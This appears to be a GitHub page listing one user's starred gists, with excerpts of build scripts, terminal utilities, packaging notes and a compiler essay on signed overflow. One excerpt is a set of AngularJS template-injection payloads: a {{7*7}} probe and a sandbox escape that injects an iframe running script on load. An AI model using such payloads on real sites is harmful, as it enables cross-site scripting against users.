Stephan Sokolow ssokolow

@anp
anp / coverage.py
Created September 20, 2016 16:13
rust code coverage with kcov
#!/usr/bin/env python2
# butchered from https://github.com/huonw/travis-cargo
# under MIT license
from __future__ import print_function
import argparse
import os
import sys
import subprocess
@HaleTom
HaleTom / print256colours.sh
Last active May 2, 2024 14:43
Print a 256-colour test pattern in the terminal
#!/bin/bash
# Tom Hale, 2016. MIT Licence.
# Print out 256 colours, with each number printed in its corresponding colour
# See http://askubuntu.com/questions/821157/print-a-256-color-test-pattern-in-the-terminal/821163#821163
set -eu # Fail on errors or undeclared variables
printable_colours=256
# Love you, GNU. But got a bit tired of this conversation pattern:
#
# % ln -h
# ln: invalid option -- 'h'
# Try 'ln --help' for more information.
#
# Don't worry. I fixed you for me.
#
# Eternally yours,
#
@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

The `{{7*7}}` line is the probe: it renders as 49 only if the input is being evaluated as an Angular expression. The two lines that follow are the sandbox-escape payload for that version range.

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
#!/bin/bash
# Usage: gog_dex_extract_music.sh <data_dir>
#
# The script relies on these utilities:
# 1. QuickBMS extractor (quickbms)
# See http://aluigi.altervista.org/quickbms.htm
# Source: http://aluigi.altervista.org/papers/quickbms_src.zip
#
# 2. Unity BMS script to be used with QuickBMS (unity.bms)
@flibitijibibo
flibitijibibo / flibitPackaging.md
Created June 17, 2016 16:00
Hope you like reading ldd output!

A week ago I was CC'd in on a thread about Linux packaging, and how to avoid doing it the wrong way (i.e. RPM, Deb, etc.). I've always used MojoSetup and I've never forced distributions to do any additional work, but this is still a new concept to a lot of people. Additionally, Amos suggested that I expand on Itch's FNA appendix, so here's a guide on how I package my games.

This is a bit of an expansion on my MAGFest 2016 presentation, which you can find here:

http://www.flibitijibibo.com/magfest2016/

https://www.youtube.com/watch?v=B83CWUh0Log

I would recommend looking at that first! After that, read on...

@bskinn
bskinn / intersphinx_mappings.txt
Last active May 3, 2024 09:39
Various intersphinx mappings
# The entries in this file are checked regularly for validity via the Github Action
# sited at github.com/bskinn/intersphinx-gist.
# Please feel free to post an issue at that repo if any of these mappings don't work for you,
# or if you're having trouble constructing a mapping for a project not listed here.
Python 3 [latest]: ('https://docs.python.org/3/', None)
Python 3 [3.x]: ('https://docs.python.org/3.9/', None)
attrs [stable]: ('https://www.attrs.org/en/stable/', None)
Django [dev]: ('https://docs.djangoproject.com/en/dev/', 'https://docs.djangoproject.com/en/dev/_objects/')
Flask [2.2.x]: ('https://flask.palletsprojects.com/en/2.2.x/', None)
#!/bin/bash
# Shows status of selected wine dlls (like for DX11).
# Inspired by https://www.winehq.org/winapi_stats.
# The script works best in terminals with true color support,
# but it should work with fewer colors as well.
function no_clr()
{
printf '\x1b[0m'
}
@rygorous
rygorous / gist:e0f055bfb74e3d5f0af20690759de5a7
Created May 8, 2016 06:54
A bit of background on compilers exploiting signed overflow
Why do compilers even bother exploiting the undefinedness of signed overflow? And what are those
mysterious cases where it helps?
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.
TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed overflow UB exploitation is an attempt to work around this.
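As an added illustration of the TL;DR above (example code written for this page, not taken from rygorous' gist): on a 64-bit target with a 32-bit `int`, the address of `p[i + k]` can be computed two ways. If signed overflow had to wrap, the compiler would have to do the add in 32 bits, truncate, and sign-extend on every access; if overflow is undefined, it may widen `i` and `k` once and add in 64 bits, which is what lets it hoist the extension out of a loop. The two functions below make that difference observable; they agree exactly when `i + k` does not overflow, which is the assumption the optimizer is making. The last function is the security-side caveat: the same assumption lets a post-hoc check like `if (x + k < x)` be deleted, so overflow must be tested before the add. The code assumes `int` is 32 bits (true on all major 64-bit targets, as the gist notes) and uses `int64_t` rather than `long` so it also holds on LLP64 Windows.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Offset that wrapping-int semantics would require for p[i + k]:
 * 32-bit add, truncate to int, then sign-extend to the pointer width.
 * The 32-bit add is done in unsigned arithmetic so the wrap is defined
 * here and the result is reinterpreted as two's-complement. */
int64_t wrapped_index(int i, int k)
{
    unsigned u = (unsigned)i + (unsigned)k;          /* wraps mod 2^32 */
    int wrapped = (u <= (unsigned)INT_MAX) ? (int)u   /* fits as-is */
                                           : -(int)(~u) - 1; /* u - 2^32 */
    return (int64_t)wrapped;
}

/* Offset the compiler may compute when signed overflow is undefined:
 * widen each operand once and add at pointer width. No per-iteration
 * truncation or sign-extension is needed. */
int64_t widened_index(int i, int k)
{
    return (int64_t)i + (int64_t)k;
}

/* Caveat for security code: `if (x + k < x)` relies on the overflow
 * happening, which the optimizer is entitled to assume never does, so it
 * may remove the branch. Decide before adding, using only in-range
 * arithmetic. Returns 1 and stores the sum on success, 0 on overflow. */
int add_checked(int x, int k, int *out)
{
    if ((k > 0 && x > INT_MAX - k) || (k < 0 && x < INT_MIN - k))
        return 0;
    *out = x + k;
    return 1;
}

int main(void)
{
    int sum;
    /* Constructed inputs: one in-range pair, one that overflows. */
    printf("i=100 k=5   wrapped=%lld widened=%lld\n",
           (long long)wrapped_index(100, 5), (long long)widened_index(100, 5));
    printf("i=INT_MAX k=1 wrapped=%lld widened=%lld\n",
           (long long)wrapped_index(INT_MAX, 1), (long long)widened_index(INT_MAX, 1));
    printf("add_checked(INT_MAX, 1) -> %d\n", add_checked(INT_MAX, 1, &sum));
    return 0;
}
```

For a loop such as `for (int i = 0; i < n; i++) s += p[i + k];`, `widened_index` is the form the compiler wants to emit; it is only legal because the `wrapped_index` result is never required when `i + k` stays in range.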
#!/bin/bash
# Analysis of obfuscated KoTOR II audio
#
# *** Stock mp3 encoded with lame
# position of LAME : 0x09c (156)
# position of Info : 0x024 (36)
#
# *** KoTOR II obfuscated audio (using bed_001ebo.wav)
# position of LAME : 0xc7 (199)